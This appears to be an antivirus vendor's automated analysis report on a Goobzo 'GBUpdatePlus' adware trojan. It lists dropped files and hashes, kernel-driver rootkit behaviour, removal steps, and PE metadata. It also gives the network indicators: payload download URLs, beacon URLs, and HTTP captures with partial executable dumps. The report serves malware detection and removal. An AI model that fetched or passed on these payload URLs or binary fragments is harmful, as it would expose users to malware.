a879b0ae2ad98ac8e1c0f8912837eb2d	c:\Program Files\Common Files\Goobzo\GBUpdatePlus\rlz_id.dll
5931f1438015a3e263226d6ea4a8b182	c:\Program Files\Common Files\Goobzo\GBUpdatePlus\sma.exe
675f7fdc1224c197df5e7eef84d1a8f9	c:\Program Files\Common Files\Goobzo\GBUpdatePlus\smci32.dll
10ba4048085923cf264eaeee708e98ab	c:\Program Files\Common Files\Goobzo\GBUpdatePlus\smi32.exe
4db4b7e64f2fb4e5394d085afb429280	c:\Program Files\Common Files\Goobzo\GBUpdatePlus\smp.exe
556b1f1d6fd1f191c77b1167cd006abc	c:\Program Files\Common Files\Goobzo\GBUpdatePlus\smu.exe
c9828a10a4b5644cf236b1cce749dddb	c:\Program Files\Common Files\Goobzo\GBUpdatePlus\smw.sys
05c47da12b0009bd98653f51287f7768	c:\Users\"%CurrentUserName%"\AppData\Local\Temp\Install_22888\bxsdk32.dll

HOSTS file anomalies

No changes have been detected.

Rootkit activity

Using the driver "\??\%Program Files%\Common Files\Goobzo\GBUpdatePlus\smw.sys" the Trojan controls creation and closing of threads by installing the thread notifier.

Using the driver "\??\%Program Files%\Common Files\Goobzo\GBUpdatePlus\smw.sys" the Trojan controls loading executable images into a memory by installing the Load image notifier.

Propagation

Removals

Remove it with Ad-Aware

Click (here) to download and install Ad-Aware Free Antivirus.
Update the definition files.
Run a full scan of your computer.

Manual removal*

Scan a system with an anti-rootkit tool.
Terminate malicious process(es) (How to End a Process With the Task Manager):
smu.exe:2540
smu.exe:3356
sma.exe:308
sma.exe:4008
sma.exe:3164
sma.exe:3192
%original file name%.exe:3380
%original file name%.exe:264
smp.exe:3444
smp.exe:2836
tcpsvcs.exe:3488
tcpsvcs.exe:1504
Delete the original Trojan file.
Delete or disinfect the following files created/modified by the Trojan:
C:\ProgramData\SearchModulePlus\smhe.js (407 bytes)
C:\Windows\Temp\Pre83CF.tmp (601 bytes)
C:\Windows\Temp\Pre93AB.tmp (601 bytes)
C:\Windows\Temp\Web93AC.tmp (63 bytes)
C:\Windows\Temp\Pre83E0.tmp (601 bytes)
C:\Windows\Temp\Web83D0.tmp (63 bytes)
C:\Windows\Temp\Web83E1.tmp (63 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Installer\Install_13704\%original file name%.exe (7433 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Installer\Installytd_6828\%original file name%.exe (7433 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Install_22888\bxsdk32.dll (1192 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Installer\Install_9822\%original file name%.exe (7433 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk (2 bytes)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Search.lnk (2 bytes)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Mozilla Firefox.lnk (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Internet Explorer.lnk (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Internet Explorer (No Add-ons).lnk (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk (1 bytes)
%Program Files%\Common Files\Goobzo\GBUpdatePlus\Search.lnk (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\5a2ce8gs.default\search-metadata.json (95 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Preferences (11028 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\5a2ce8gs.default\searchplugins\smod.xml (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences (9416 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\5a2ce8gs.default\prefs.js (388 bytes)
%Program Files%\Common Files\Goobzo\GBUpdatePlus\SMUninstall.exe (10136 bytes)
%Program Files%\Common Files\Goobzo\GBUpdatePlus\sma.exe (8560 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsr6EF9.tmp\ns715C.tmp (14 bytes)
%Program Files%\Common Files\Goobzo\GBUpdatePlus\SBIEBrowserHelperObject.dll (3312 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsr6EF9.tmp\ns8C5D.tmp (14 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsr6EF9.tmp\nsExec.dll (14 bytes)
%Program Files%\Common Files\Goobzo\GBUpdatePlus\smci32.dll (45051 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsr6EF9.tmp\System.dll (23 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsr6EF9.tmp\ns85B7.tmp (14 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsr6EF9.tmp\AccD.dll (7392 bytes)
%Program Files%\Common Files\Goobzo\GBUpdatePlus\Updater.exe (25776 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsr6EF9.tmp\ns96D9.tmp (14 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsr6EF9.tmp\nsProcess.dll (12 bytes)
%Program Files%\Common Files\Goobzo\GBUpdatePlus\rlz_id.dll (3616 bytes)
%Program Files%\Common Files\Goobzo\GBUpdatePlus\smi32.exe (12088 bytes)
%Program Files%\Common Files\Goobzo\GBUpdatePlus\smu.exe (56684 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsr6EF8.tmp (245963 bytes)
%Program Files%\Common Files\Goobzo\GBUpdatePlus\smw.sys (784 bytes)
%Program Files%\Common Files\Goobzo\GBUpdatePlus\smp.exe (6584 bytes)
Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

Static Analysis

VersionInfo

Company Name:
Product Name:
Product Version: 2.11.0.999
Legal Copyright: Copyright (C) 2014
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 2.11.0.999
File Description:
Comments:
Language: English (United States)

Company Name: Product Name: Product Version: 2.11.0.999Legal Copyright: Copyright (C) 2014Legal Trademarks: Original Filename: Internal Name: File Version: 2.11.0.999File Description: Comments: Language: English (United States)

PE Sections

Name	Virtual Address	Virtual Size	Raw Size	Entropy	Section MD5
.text	4096	760735	760832	4.56168	a9cacf15e913be2edf8056b7b3c7c54e
.rdata	765952	234734	235008	3.03602	c4a59491089058aee935dcac3ad25217
.data	1003520	24872	9216	2.60093	4fa01dc463d1d2fe998b6fb156e49847
.rsrc	1032192	30912	31232	3.43692	ffbcb515ad454512ea92926edc9d30de
.reloc	1064960	48620	48640	4.61783	73b154c681e17bd08459beb64281acae

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

Network Activity

URLs

URL	IP
hxxp://dyd9qf154h76q.cloudfront.net/bxsdk32.dll	54.192.203.182
hxxp://d11sfnc01fj8ag.cloudfront.net/SetterExeV18.exe	54.192.203.231
hxxp://d1y2jryd6u59ns.cloudfront.net/p.ashx?e=obiBp3WOda8YEV9pcuJwXtjCW9 eJMmAWub0ofDzkCEegceCn LKWZkWWo76FGxQr J80GV4qARlUrzhzYzRp9T0p0D2ZyJQsnGPPRmjDA5d2L30lHqijijq6TspxE6m6TnR9dT7ayjH2CJtGrtsnASlhOyjLJ/CbfW9VjeXxBEUN4frQ/ABXA9OLpJMWKahtbjfpf6GllFxBbrJqAIXPkCN9h bV19VAhTD7v1xeC4pGvADS7bOhhWoLVpCM9iEhqt6HrlyoIuXkcHJamqYAkU5MDCXDxgXn558pQYeTa 1l 1OLNhgAaPzXL8pY6Nn8Drm/gTHnKRatpWcD7V21UixaxLjlbxVMF4Batz9n/4=	54.192.203.78
hxxp://d1y2jryd6u59ns.cloudfront.net/p.ashx?e=aQQpsP6/AW3U0UsIWSR1jVRnyF84anr3YDEAjQn1Lmtt1izXJZF/6oareh65cqCLl5HByWpqmAJFOTAwlw8YF5 efKUGHk2vtZftTizYYAGj81y/KWOjZzLYAxbXqOnWZKpgXCSq4SBoojstDGwv8wEB3BDXIoENw3BCY3BRdztfQ36gIM4S0WyMJQRmsW nYPPrzpUjRdY8g5 vR6QEB49De26f9ELU77BAEjXP3GmOBvq/txek z3knywc6xSb	54.192.203.78
hxxp://d1y2jryd6u59ns.cloudfront.net/p.ashx?e=QgW8pN5r26bof2QYjF1uPwq//z5qhHoX0EzYvxMWJRokIQgzNWOGCn 5ot6 EvdWkYIKgNqWBwS9Kbi6m4oCRvcc ZMAWsaKd CV/tiwlgli8v7N56mSgbKWjlfhE4uZvYsjUyDjDPpQHbPfmjbRP4kEtwV0krU/zEwKmF3LBrNhJ1C2zC9NPmVzJiGxHpFRq/ mwRQciAPvbT dq0IdZd990QLzNFTA30wp9ZePTAnJscN vLrCowpfd9Pvun2DZj3l0wecJba60LKguj6icg==	54.192.203.78
hxxp://d1y2jryd6u59ns.cloudfront.net/p.ashx?e=QgW8pN5r26bof2QYjF1uPwq//z5qhHoX0EzYvxMWJRokIQgzNWOGCn 5ot6 EvdWkYIKgNqWBwS9Kbi6m4oCRvcc ZMAWsaKd CV/tiwlgli8v7N56mSgbKWjlfhE4uZvYsjUyDjDPpQHbPfmjbRP4kEtwV0krU/zEwKmF3LBrNhJ1C2zC9NPmVzJiGxHpFRq/ mwRQciAPvbT dq0IdZd990QLzNFTAqiKuwJ2QNWAL/XWHChDxEUKABP6K/iqqggPnHli0tZCBSCbmHG3q6QlEj4/HBfPTcUDrej7Uo8w=	54.192.203.78
hxxp://d1y2jryd6u59ns.cloudfront.net/p.ashx?e=b1dRW7RxYKeNWlFVunW/r8YGSI1d A8Aymls69hKl9tmuEHgxcoWKfKgR0o1/4Q2D691IIN//Frcr4ZRnoqTVed w94v0JiTTx7XT5nK5LCnMFC LiKPW3CdmCq5IQSELYVoKyjeTfp30iFVS yzj8CZ3PTQ1UlUpEhiK7 V9AecEbv57UoccxOeRFW191e4SaPEemp2rOI48VIs1kHEk9UB7N1/dopRlFU7gimmHq/JscN vLrCo14/JpwhTbJacCuTErr5qdU=	54.192.203.78
hxxp://d1y2jryd6u59ns.cloudfront.net/p.ashx?e=b1dRW7RxYKeNWlFVunW/r8YGSI1d A8Aymls69hKl9tmuEHgxcoWKfKgR0o1/4Q2D691IIN//Frcr4ZRnoqTVed w94v0JiTTx7XT5nK5LCnMFC LiKPW3CdmCq5IQSELYVoKyjeTfp30iFVS yzj8CZ3PTQ1UlUpEhiK7 V9AecEbv57UoccxOeRFW191e4SaPEemp2rOI48VIs1kHEk9UB7N1/dopRLWT0ooBBF1fVw12R6ofm/Y8iQvDAJnGKH8qnmCyK7v7JBTPp2F5gxC Mhrkq09y/amn0hKiMbceR3MOwIZ76JwmTqIjEwZJX8qZPamPhh78rf8SKYsXwuBxaqSxr2X7ENAlt3MuTiXc=	54.192.203.78
hxxp://d1y2jryd6u59ns.cloudfront.net/p.ashx?e=b1dRW7RxYKeNWlFVunW/r8YGSI1d A8Aymls69hKl9tmuEHgxcoWKfKgR0o1/4Q2D691IIN//Frcr4ZRnoqTVed w94v0JiTTx7XT5nK5LCnMFC LiKPW3CdmCq5IQSELYVoKyjeTfp30iFVS yzj8CZ3PTQ1UlUpEhiK7 V9AecEbv57UoccxOeRFW191e4SaPEemp2rOI48VIs1kHEk9UB7N1/dopR5YFWQUANi8 KgQWEQh9QronZvqoB 8mW4yIycFcn/ g=	54.192.203.78
hxxp://d1y2jryd6u59ns.cloudfront.net/p.ashx?e=b1dRW7RxYKeNWlFVunW/r8YGSI1d A8Aymls69hKl9tmuEHgxcoWKfKgR0o1/4Q2D691IIN//Frcr4ZRnoqTVed w94v0JiTTx7XT5nK5LCnMFC LiKPW3CdmCq5IQSELYVoKyjeTfp30iFVS yzj8CZ3PTQ1UlUpEhiK7 V9AecEbv57UoccxOeRFW191e4SaPEemp2rOI48VIs1kHEk9UB7N1/dopRDvO0EiF3oHTyyO6Ebs4xmkKABP6K/iqqIBnlKRxyFokkn0XLiH0dH1LtCiNSAKYFf5JnRTepcv7VTVcd9MOBGUtwntjomLvg8OihZvFiIAIMn/yeJ21ljtcBdNV8N7h	54.192.203.78
hxxp://d1y2jryd6u59ns.cloudfront.net/p.ashx?e=b1dRW7RxYKeNWlFVunW/r8YGSI1d A8Aymls69hKl9tmuEHgxcoWKfKgR0o1/4Q2D691IIN//Frcr4ZRnoqTVed w94v0JiTTx7XT5nK5LCnMFC LiKPW3CdmCq5IQSELYVoKyjeTfp30iFVS yzj8CZ3PTQ1UlUpEhiK7 V9AecEbv57UoccxOeRFW191e4SaPEemp2rOI48VIs1kHEk9UB7N1/dopRvcTB46xWnxTTJVfgp7thqbPiCC4paVhd	54.192.203.78
hxxp://d1y2jryd6u59ns.cloudfront.net/p.ashx?e=xY8ohDYpM gO8fn3umFd V2PNcPuKknMw/KXmUS MBMPOudYiEhu9PpaBjL6rcaUmQydu7v0XOmnNguChnjFYyy9pizPgo8YGz00ySamWlnMFAdL1xhsmXw8 OWurQVw3PC7x86FjYgov37HB1B/zlU5UwOzfEgnfa6VRey9pub6LKPMT5YRxqPDlT6qw/1mxko6F4tH/rEF31vgH 2Mrl JfVwpv1Wva0hvOLfOrKD/wvFkFqnHHo4G r 3F6T7MDuG8rKmKv5M2lG/K85LIzCdXy2lTPRW3vJOpxfY9B1A6K4wtfvcx1y2OGa7t1CL4lfxm/XoqxEdjLvQZAWuHXAH fOgpHnMH6wMvCefXXf GeemgIzPxkm30CyQo1Eg	54.192.203.78
hxxp://d1y2jryd6u59ns.cloudfront.net/p.ashx?e=xY8ohDYpM iNWlFVunW/r0mQNIN2FjZnymls69hKl9tmuEHgxcoWKfKgR0o1/4Q2D691IIN//Frcr4ZRnoqTVed w94v0JiTTx7XT5nK5LCnMFC LiKPW3CdmCq5IQSELYVoKyjeTfp30iFVS yzj8CZ3PTQ1UlUpEhiK7 V9AecEbv57UoccxOeRFW191e4SaPEemp2rOI48VIs1kHEk3qnzi9PVmquIApimWCrqakE8SFHLIEPsGc6 n uqijtZ6R90h7cidQhE1rXBz99ttxfA3C6KKE5uvEmaSYLmhGU1IGevJVygthPlRO7ICGTcD5MbnMHcJ64LtTjETGDUCjBYGPK7rWfXeCi/0KZZptbQRhqH8Cssw==	54.192.203.78
hxxp://d1y2jryd6u59ns.cloudfront.net/p.ashx?e=XJYuqQQo69dBmScQe cMuF2PNcPuKknMCkdmPrP3LyEPOudYiEhu9PpaBjL6rcaUmQydu7v0XOmnNguChnjFYyy9pizPgo8YGz00ySamWlnMFAdL1xhsmXw8 OWurQVw3PC7x86FjYgov37HB1B/zlU5UwOzfEgnfa6VRey9pub6LKPMT5YRxqPDlT6qw/1mxko6F4tH/rEF31vgH 2Mrp7TtIX8b4qVoW979 PTPR/sLIuaJBIVfI4G r 3F6T7f9F3I6C91SWT/e9lpr/riA==	54.192.203.78
hxxp://d1y2jryd6u59ns.cloudfront.net/p.ashx?e=lOCrbsNL2zWNWlFVunW/r0mQNIN2FjZnymls69hKl9tmuEHgxcoWKfKgR0o1/4Q2D691IIN//Frcr4ZRnoqTVed w94v0JiTTx7XT5nK5LCnMFC LiKPW3CdmCq5IQSELYVoKyjeTfp30iFVS yzj8CZ3PTQ1UlUpEhiK7 V9AecEbv57UoccxOeRFW191e4SaPEemp2rOI48VIs1kHEk3qnzi9PVmquvcTB46xWnxTle2fwOdHS0Y4G r 3F6T7bkBEy9Iv l4=	54.192.203.78
hxxp://d1y2jryd6u59ns.cloudfront.net/p.ashx?e=lOCrbsNL2zWNWlFVunW/r0mQNIN2FjZnymls69hKl9tmuEHgxcoWKfKgR0o1/4Q2D691IIN//Frcr4ZRnoqTVed w94v0JiTTx7XT5nK5LCnMFC LiKPW3CdmCq5IQSELYVoKyjeTfp30iFVS yzj8CZ3PTQ1UlUpEhiK7 V9AecEbv57UoccxOeRFW191e4SaPEemp2rOI48VIs1kHEk3qnzi9PVmqu/rKHYTwtRGYUAvnawhe3hbaBd5qR8ufkww3xXMGSlPc=	54.192.203.78
hxxp://d1y2jryd6u59ns.cloudfront.net/p.ashx?e=lOCrbsNL2zWNWlFVunW/r0mQNIN2FjZnymls69hKl9tmuEHgxcoWKfKgR0o1/4Q2D691IIN//Frcr4ZRnoqTVed w94v0JiTTx7XT5nK5LCnMFC LiKPW3CdmCq5IQSELYVoKyjeTfp30iFVS yzj8CZ3PTQ1UlUpEhiK7 V9AecEbv57UoccxOeRFW191e4SaPEemp2rOI48VIs1kHEk3qnzi9PVmqu/rKHYTwtRGYUAvnawhe3hYcizBU3y3xpkudLwF4whtg=	54.192.203.78
hxxp://d1y2jryd6u59ns.cloudfront.net/p.ashx?e=lOCrbsNL2zWNWlFVunW/r0mQNIN2FjZnymls69hKl9tmuEHgxcoWKfKgR0o1/4Q2D691IIN//Frcr4ZRnoqTVed w94v0JiTTx7XT5nK5LCnMFC LiKPW3CdmCq5IQSELYVoKyjeTfp30iFVS yzj8CZ3PTQ1UlUpEhiK7 V9AecEbv57UoccxOeRFW191e4SaPEemp2rOI48VIs1kHEk3qnzi9PVmqujsg/omkWbCTQlB3kfGAhd0M7 7p6G3XAOQeYuSCl878AKo0mRYbtZmTrdmoQBtHVvQShiKWZ9cFEj3apiqwElP87VSn8EQRfyltSMgrsTyl8aUSP2VoumlpLPC 4XcIm7cGFoGtp5ECS7IK1ett99MZ5kXJQtKy834mgW150Op0Y6r6EQu3En4ua1g4fVI4GJA9YFpnE8QO8567A9PF2tojJydmmwDtH8qBHSjX/hDYPr3Ugg3/8WtyvhlGeipNV537D3i/QmJNPHtdPmcrksKcwUL4uIo9bBcP67p/rswd0aUeoU PGdmwVVPh7TxXkBCDWG0W34WuMrG6DH6H0HA==	54.192.203.78
hxxp://d1y2jryd6u59ns.cloudfront.net/p.ashx?e=lOCrbsNL2zWNWlFVunW/r0mQNIN2FjZnymls69hKl9tmuEHgxcoWKfKgR0o1/4Q2D691IIN//Frcr4ZRnoqTVed w94v0JiTTx7XT5nK5LCnMFC LiKPW3CdmCq5IQSELYVoKyjeTfp30iFVS yzj8CZ3PTQ1UlUpEhiK7 V9AecEbv57UoccxOeRFW191e4SaPEemp2rOI48VIs1kHEk3qnzi9PVmqubz0XqPn9zR0IiyFlsxNmPbPiCC4paVhdpvBRerX5l2CaTGmM9zHPWA==	54.192.203.78
hxxp://d1y2jryd6u59ns.cloudfront.net/p.ashx?e=WL9usJOVMsOQs n7i1BIkNjCW9 eJMmApZtSBouT4jcegceCn LKWZkWWo76FGxQr J80GV4qARlUrzhzYzRp9T0p0D2ZyJQsnGPPRmjDA5d2L30lHqijijq6TspxE6m6TnR9dT7ayjH2CJtGrtsnASlhOyjLJ/CbfW9VjeXxBEUN4frQ/ABXA9OLpJMWKahtbjfpf6GllFxBbrJqAIXPlLthe3E5HJFfRWApYRElbXqR4rzu9tChTEzQGoF c24CSOMVPCH eA=	54.192.203.78
hxxp://d1y2jryd6u59ns.cloudfront.net/p.ashx?e=WL9usJOVMsPlWW0ay34fCUdUxmGl9EyeYDEAjQn1Lmtt1izXJZF/6oareh65cqCLl5HByWpqmAJFOTAwlw8YF5 efKUGHk2vtZftTizYYAGj81y/KWOjZzLYAxbXqOnWZKpgXCSq4SBoojstDGwv8wEB3BDXIoENw3BCY3BRdztfQ36gIM4S0WyMJQRmsW nYPPrzpUjRdY8g5 vR6QEB/nYE3DWujWaoU2sQ4uGCDUUAvnawhe3hbDffmPgH7pM6gKn8h0qT3aBcaoZob0e9Q==	54.192.203.78
hxxp://d1y2jryd6u59ns.cloudfront.net/p.ashx?e=WL9usJOVMsPlWW0ay34fCUdUxmGl9EyeYDEAjQn1Lmtt1izXJZF/6oareh65cqCLl5HByWpqmAJFOTAwlw8YF5 efKUGHk2vtZftTizYYAGj81y/KWOjZzLYAxbXqOnWZKpgXCSq4SBoojstDGwv8wEB3BDXIoENw3BCY3BRdztfQ36gIM4S0WyMJQRmsW nYPPrzpUjRdY8g5 vR6QEB/nYE3DWujWaoU2sQ4uGCDUUAvnawhe3hbDffmPgH7pMiQNTh4u5dqPxEMNdFi25Gw==	54.192.203.78
hxxp://d1y2jryd6u59ns.cloudfront.net/p.ashx?e=WL9usJOVMsPlWW0ay34fCUdUxmGl9EyeYDEAjQn1Lmtt1izXJZF/6oareh65cqCLl5HByWpqmAJFOTAwlw8YF5 efKUGHk2vtZftTizYYAGj81y/KWOjZzLYAxbXqOnWZKpgXCSq4SBoojstDGwv8wEB3BDXIoENw3BCY3BRdztfQ36gIM4S0WyMJQRmsW nYPPrzpUjRdY8g5 vR6QEB/nYE3DWujWaoU2sQ4uGCDUUAvnawhe3hYcizBU3y3xpkudLwF4whtg=	54.192.203.78
hxxp://d1y2jryd6u59ns.cloudfront.net/p.ashx?e=043Mckb8Lnhw7iCtSAyu/ QhfXa/CCW5NPZS6pZIlAEr4Spdf2ZexL9An1YluClXsGG6qLQR8LceI9VTThLJ3UlF4mqrDXF/L3OhFAPbRTejORB6u31KNxKv6VolbFNDUxX212nyBDAafyyUl C9vORgvLZHT a72UC/bfWIAgSqinVSQQ1bE6yLXK7ul6nZPXUNd68JXUDrKwD6t b1ZfKiWnlKjT8nQI8HtM9wp5Tx0cXu7AB1uimF904v4t2DIApimWCrqakt3bH6c7GAHITnquSe8GwjLnPqEPf2/rl3s8pSKbhxWudjDabjiU15bfhBVTXmVIKy2EBoQQl304tsVuXqTBm48VmE3ZuCJs4y1aJnkp ScdBb0CbA7Wqcrbq8YHwKZS4RrSPwflTyFw==	54.192.203.78
hxxp://d13s98z2lzti92.cloudfront.net/smw121634dp.exe	54.192.203.172
hxxp://d1y2jryd6u59ns.cloudfront.net/p.ashx?e=lOCrbsNL2zXY n Drgf83Ceu24nwBOho9kJpoiaoxYTLUfe2AWI4iW/NJcbq0HoEgctTzNTrZipoENv9hv yb1U5UwOzfEgnfa6VRey9pub6LKPMT5YRxqPDlT6qw/1mxko6F4tH/rEF31vgH 2Mri4btG OZIk/aFQl5nsf8/DcvKSgaF6RF7PiCC4paVhdKPgmwjXNu7I=	54.192.203.78
hxxp://d1y2jryd6u59ns.cloudfront.net/p.ashx?e=lOCrbsNL2zXY n Drgf83Ceu24nwBOho9kJpoiaoxYR6njPZcIS19LQZ0RbIZgn/G04r2GZQbxA4k4Gm5vvSsnGAt48jCvkuTKeC3EisBSuPQCW3Xc52o2/NJcbq0HoEgctTzNTrZipoENv9hv yb1U5UwOzfEgnfa6VRey9pub6LKPMT5YRxqPDlT6qw/1mxko6F4tH/rEF31vgH 2Mri4btG OZIk/aFQl5nsf8/DcvKSgaF6RF7PiCC4paVhdYzx82mF 8 w=	54.192.203.78
hxxp://d1y2jryd6u59ns.cloudfront.net/p.ashx?e=bdqY0vC4PYtCQdt9doPgoA0rZFNspeHnFDDfVv/vH29/uaLevhL3VpGCCoDalgcEvSm4upuKAkb3HPmTAFrGinfglf7YsJYJYvL zeepkoH7lS9xrvVML BEf8zqYXvVBuc4HO5RaucB0eAPmqRh7cqZ27dtquSa6Yc5lgnLWj9NhpNg/N/OrsNgV0KIQ93 dulfay3 QHl32cx0G27ZSGAqR2XPWVGh9o0hxHg3iWEUAvnawhe3hRc0NdkJ4D18DFbcjOkM5Uo QFr7zZfYbQ==	54.192.203.78
hxxp://d23ocewf5ttxmu.cloudfront.net/br.ashx?pid={PID}&aid={AID}&ss=0&s=FAAzamodk0,99999999-9999-4180-88c6-7a076893e507,&v=2.3.12.1634&md5=8fabe64f8ec5d8b0b835e8a83f29082c&mid=AiAAAiAAA3A9AAA7A3AJieA1A91J7L773DiLAiiAA13D1J&uid=6F75218C-FEA5-4C12-BC59-BB31CD1E1E1A	54.192.203.154
hxxp://d23ocewf5ttxmu.cloudfront.net/br.ashx?pid={PID}&aid={AID}&ss=0&s=FAAzamodk0,99999999-9999-4180-88c6-7a076893e507,&v=2.3.12.1634&md5=8e5f14f8a0400cd752505753c0d3e3a5&mid=AiAAAiAAA3A9AAA7A3AJieA1A91J7L773DiLAiiAA13D1J&uid=6F75218C-FEA5-4C12-BC59-BB31CD1E1E1A	54.192.203.154
hxxp://d23ocewf5ttxmu.cloudfront.net/br.ashx?pid={PID}&aid={AID}&ss=0&s=FAAzamodk0,99999999-9999-4180-88c6-7a076893e507,&v=2.3.12.1634&md5=c4fa67064bd22dd0878e685855ab7e9a&mid=AiAAAiAAA3A9AAA7A3AJieA1A91J7L773DiLAiiAA13D1J&uid=6F75218C-FEA5-4C12-BC59-BB31CD1E1E1A	54.192.203.154

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

Traffic

GET /bxsdk32.dll HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: dyd9qf154h76q.cloudfront.net

Connection: Keep-Alive

HTTP/1.1 200 OK

Content-Type: application/octet-stream

Content-Length: 942080

Connection: keep-alive

Date: Thu, 16 Mar 2017 13:47:42 GMT

Last-Modified: Tue, 25 Nov 2014 14:05:45 GMT

ETag: "05c47da12b0009bd98653f51287f7768"

Accept-Ranges: bytes

Server: AmazonS3

Age: 64835

X-Cache: Hit from cloudfront

Via: 1.1 a034346227db119f7e0813186ca2d2c2.cloudfront.net (CloudFront)

X-Amz-Cf-Id: FsDAYkxk2XssNWIwo0JzA2LXQpVjlT2zjtCWJVvPC-tU_XcSyLk26w==

MZ......................@.............................................

..!..L.!This program cannot be run in DOS mode....$.......gu..#...#...

#.......!...........#...........I......."......."......."...Rich#.....

......................PE..L...9.dT...........!................P.......

.................................`....................................

..............................................tn..@...................

................................8............................text...O.

.......................... ..`.rdata...t..........................@..@

.data...x.... ....... ..............@....rsrc.........................

......@..@.reloc..............................@..B....................

......................................................................

..................................................................

<<< skipped >>>

GET /SetterExeV18.exe HTTP/1.1

Range: bytes=0-249999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d11sfnc01fj8ag.cloudfront.net

Connection: Keep-Alive

HTTP/1.1 206 Partial Content

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

Cache-Control: private

Last-Modified: Tue, 28 Jul 2015 20:29:52 GMT

Accept-Ranges: bytes

ETag: "a670962874c9d01:0"

Server: Microsoft-IIS/7.5

X-Powered-By: ASP.NET

Date: Mon, 20 Mar 2017 00:19:55 GMT

Content-Range: bytes 0-249999/520704

X-Cache: Miss from cloudfront

Via: 1.1 27b3a801292660302bc6c8d6a96c71ce.cloudfront.net (CloudFront)

X-Amz-Cf-Id: MJpICvSj2Cydx-1WUjll0t1VA0m2Ma9kx_kASN-RYyDUhX-SsbfcrA==

MZ......................@.............................................

..!..L.!This program cannot be run in DOS mode....$.......]O..........

......*......|2......|..K....|.......V~.............dW..-....|6.......

z.....dW3.....Rich....................PE..L......U....................

......................@..........................@............@.......

...........................>..................................tY...

...................................@..................................

..........text...E........................... ..`.rdata...............

...............@..@.data....[...`...6...F..............@....rsrc......

..........|..............@..@.reloc..tY.......Z..................@..B.

......................................................................

...............................................h`.E..uW..Y.V...F.V.^..

.YPV..wG... ..hk.E..PW..Y^.V...F.V.8...YPV..vG... ..hz.E..*W..Y^.V...F

.V.....YPV..vG..\ ..h..E...W..Y^.V...F.V.....YPV..vG..6 ..h..E...V..Y^

.V...F.V.....YPV..vG... ..h..E...V..Y^.V...F.V.....YPV..vG......h..E..

.V..Y^.V...F.V.z...YPV.PvG......h..E..lV..Y^.h..F....G......h..E..PV..

Y.h..F....G......h..E..5V..Y.V.(.F.V.....YPV.hvG..h...h..E...V..Y^.V.8

.F.V.....YPV..vG..B...h..E...U..Y^.h&.E...U..Y.h..E...U..Y.h..E...U..Y

.h@.E...U..Y.V...F.V.....YPV..wG......hK.E...U..Y^.V...F.V.|...YPV

<<< skipped >>>

GET /SetterExeV18.exe HTTP/1.1

Range: bytes=500000-520703

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d11sfnc01fj8ag.cloudfront.net

Connection: Keep-Alive

HTTP/1.1 206 Partial Content

Content-Type: application/octet-stream

Content-Length: 20704

Connection: keep-alive

Cache-Control: private

Last-Modified: Tue, 28 Jul 2015 20:29:52 GMT

Accept-Ranges: bytes

ETag: "a670962874c9d01:0"

Server: Microsoft-IIS/7.5

X-Powered-By: ASP.NET

Date: Mon, 20 Mar 2017 00:19:56 GMT

Content-Range: bytes 500000-520703/520704

X-Cache: Miss from cloudfront

Via: 1.1 27b3a801292660302bc6c8d6a96c71ce.cloudfront.net (CloudFront)

X-Amz-Cf-Id: 3GTcsb7j63vuDDgY2d3TJxFAlC8gP__tZGa3NEqL3Ij31jqEzaeSAA==

HTTP/1.1 206 Partial Content..Content-Type: application/octet-stream..

Content-Length: 20704..Connection: keep-alive..Cache-Control: private.

